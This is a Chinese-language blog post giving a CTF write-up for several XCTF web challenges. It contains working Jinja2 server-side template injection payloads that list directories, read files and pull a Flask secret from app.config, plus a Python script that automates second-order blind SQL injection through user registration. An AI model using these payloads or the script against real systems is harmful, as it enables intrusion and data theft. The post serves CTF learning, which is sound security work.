<!DOCTYPE html>
<html lang="zh_cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"rock718.github.io.git","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="X-CTF WEB 题目解题思路1.backupphp备份文件格式.php~、.php.bak。 2.Web_python_template_injection检测是否存在注入。 &#x2F;&amp;#123;&amp;#123;2*2&amp;#125;&amp;#125;  发现2*2被计算为了4,说明存在注入。尝试枚举当前目录下的文件。 &amp;#123;&amp;#123;&#39;&#39;.__class__.__mro__[2].__subclasse">
<meta property="og:type" content="article">
<meta property="og:title" content="xctf-web-wp">
<meta property="og:url" content="https://rock718.github.io.git/2019/12/30/xctf-web-wp/index.html">
<meta property="og:site_name" content="Rock&#39;s blog">
<meta property="og:description" content="X-CTF WEB 题目解题思路1.backupphp备份文件格式.php~、.php.bak。 2.Web_python_template_injection检测是否存在注入。 &#x2F;&amp;#123;&amp;#123;2*2&amp;#125;&amp;#125;  发现2*2被计算为了4,说明存在注入。尝试枚举当前目录下的文件。 &amp;#123;&amp;#123;&#39;&#39;.__class__.__mro__[2].__subclasse">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-12-30T03:04:32.000Z">
<meta property="article:modified_time" content="2020-05-26T13:47:52.000Z">
<meta property="article:author" content="Rock">
<meta property="article:tag" content="web">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="xctf">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://rock718.github.io.git/2019/12/30/xctf-web-wp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh_cn'
  };
</script>

  <title>xctf-web-wp | Rock's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Rock's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">兴趣是最好的老师</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh_cn">
    <link itemprop="mainEntityOfPage" href="https://rock718.github.io.git/2019/12/30/xctf-web-wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Rock">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Rock's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          xctf-web-wp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-12-30 11:04:32" itemprop="dateCreated datePublished" datetime="2019-12-30T11:04:32+08:00">2019-12-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-05-26 21:47:52" itemprop="dateModified" datetime="2020-05-26T21:47:52+08:00">2020-05-26</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="X-CTF-WEB-题目解题思路"><a href="#X-CTF-WEB-题目解题思路" class="headerlink" title="X-CTF WEB 题目解题思路"></a>X-CTF WEB 题目解题思路</h1><h3 id="1-backup"><a href="#1-backup" class="headerlink" title="1.backup"></a>1.backup</h3><p>php备份文件格式<code>.php~</code>、<code>.php.bak</code>。</p>
<h3 id="2-Web-python-template-injection"><a href="#2-Web-python-template-injection" class="headerlink" title="2.Web_python_template_injection"></a>2.Web_python_template_injection</h3><p>检测是否存在注入。</p>
<pre><code>/&#123;&#123;2*2&#125;&#125;
</code></pre>
<p>发现2*2被计算为了4,说明存在注入。<br>尝试枚举当前目录下的文件。</p>
<pre><code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')&#125;&#125;
</code></pre>
<p>再读取文件</p>
<pre><code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()&#125;&#125;
</code></pre>
<h3 id="3-shrine"><a href="#3-shrine" class="headerlink" title="3.shrine"></a>3.shrine</h3><p>题目给出了部分代码，整理如下：</p>
<pre><code>import flask
import os

app = flask.Flask(__name__)
app.config[&#39;FLAG&#39;] = os.environ.pop(&#39;FLAG&#39;)

@app.route(&#39;/&#39;)
def index():
    return open(__file__).read()

@app.route(&#39;/shrine/&lt;path:shrine&gt;&#39;)
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace(&#39;(&#39;, &#39;&#39;).replace(&#39;)&#39;, &#39;&#39;)
        blacklist = [&#39;config&#39;, &#39;self&#39;]
        return &#39;&#39;.join([&#39;&#123;&#123;% set &#123;&#125;=None%&#125;&#125;&#39;.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == &#39;__main__&#39;:
    app.run(debug=True)
</code></pre>
<p>大概意思是题目将flag放在了<code>app.config[&#39;FLAG&#39;]</code>中，同时对<code>/shrine/</code>下的请求参数做了过滤。将<code>(</code>和<code>)</code>替换为空。也将config和self对应变量设为了None。</p>
<p>有以下两种wp：</p>
<p>1</p>
<pre><code>/shrine/&#123;&#123;get_flashed_messages.__globals__['current_app'].config['FLAG']&#125;&#125;
</code></pre>
<p>2</p>
<pre><code>/shrine/&#123;&#123;url_for.__globals__['current_app'].config['FLAG']&#125;&#125;
</code></pre>
<p>get_flashed_messages()和url_for()是flask框架中的函数。</p>
<p>get_flashed_messages()作用如下：</p>
<ul>
<li>设置:flash(‘aaa’)</li>
<li>取值：get_flashed_message()</li>
<li>假设在a页面操作出错，跳转到b页面，在b页面显示a页面的错误信息</li>
</ul>
<p>url_for()作用如下：</p>
<ul>
<li>给指定的函数构造 URL。</li>
<li>访问静态文件(CSS &#x2F; JavaScript 等)。</li>
</ul>
<h3 id="4-unfinish"><a href="#4-unfinish" class="headerlink" title="4.unfinish"></a>4.unfinish</h3><p>首先看到的是一个登录界面，猜测有注册界面。<br>扫描目录后，发现确实有注册界面。</p>
<p>尝试注册用户并登录，发现登录后会把用户名显示出来，没有其他特别的内容。</p>
<p>对注册时的三个参数进行特殊字符和关键字测试，发现用户名有些异常响应。</p>




<p>猜测用户名处存在注入，且可能为二次注入。<br>经测试，大概过滤了<code>,</code>和<code>information</code>。</p>
<p>可得到数据库名为<code>web</code>，但表名无法得到。查看参考答案后得知表名全靠猜。</p>
<p>最终的注入程序如下：</p>
<pre><code>import requests

baseURL = &quot;http://124.126.19.106:53212/&quot;
fObj = open(&quot;/root/Desktop/unfinish.txt&quot;,&quot;r&quot;)
regCount = int(fObj.read())
fObj.close()

try:
    for i in range(50):
        payload = &quot;0&#39;+ascii(substr((select * from flag) from &quot;+ str(i+1) +&quot; for 1))+&#39;0&quot;
        # 注册用户名
        regCount += 1
        parma = &#123;&quot;email&quot;:&quot;test&quot; + str(regCount) + &quot;@qq.com&quot;, &quot;username&quot;:payload, &quot;password&quot;:&quot;1111&quot;&#125;
        register = requests.post(baseURL+&quot;register.php&quot;, data=parma)
        # 登录
        parma = &#123;&quot;email&quot;:&quot;test&quot; + str(regCount) + &quot;@qq.com&quot;, &quot;password&quot;:&quot;1111&quot;&#125;
        login = requests.post(baseURL+&quot;login.php&quot;, data=parma)
        # print(login.text)
        username = login.text.split(&quot;&lt;span class=\&quot;user-name\&quot;&gt;&quot;)[1].split(&quot;&lt;/span&gt;&quot;)[0].strip()
        if username == &#39;0&#39;:
            break
        print(chr(int(username)), end=&#39;&#39;)
    print()
finally:
    fObj = open(&quot;/root/Desktop/unfinish.txt&quot;,&quot;w&quot;)
    fObj.write(str(regCount))
    fObj.close()
</code></pre>
<p><em><strong>unfinish.txt用来计数注册了多少个用户，因为该题目用户一旦注册，用户名就不能改变了，所以每次注册必须使用新邮箱。</strong></em></p>
<h3 id="未完待续……"><a href="#未完待续……" class="headerlink" title="未完待续……"></a>未完待续……</h3>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/writeup/" rel="tag"># writeup</a>
              <a href="/tags/xctf/" rel="tag"># xctf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/12/24/jarvisoj-web-wp/" rel="prev" title="jarvisoj web 题目解答">
      <i class="fa fa-chevron-left"></i> jarvisoj web 题目解答
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/01/04/PNG-write-payload/" rel="next" title="PNG-write-payload">
      PNG-write-payload <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#X-CTF-WEB-%E9%A2%98%E7%9B%AE%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.</span> <span class="nav-text">X-CTF WEB 题目解题思路</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-backup"><span class="nav-number">1.0.1.</span> <span class="nav-text">1.backup</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-Web-python-template-injection"><span class="nav-number">1.0.2.</span> <span class="nav-text">2.Web_python_template_injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-shrine"><span class="nav-number">1.0.3.</span> <span class="nav-text">3.shrine</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-unfinish"><span class="nav-number">1.0.4.</span> <span class="nav-text">4.unfinish</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD%E2%80%A6%E2%80%A6"><span class="nav-number">1.0.5.</span> <span class="nav-text">未完待续……</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Rock</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Rock</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

</body>
</html>
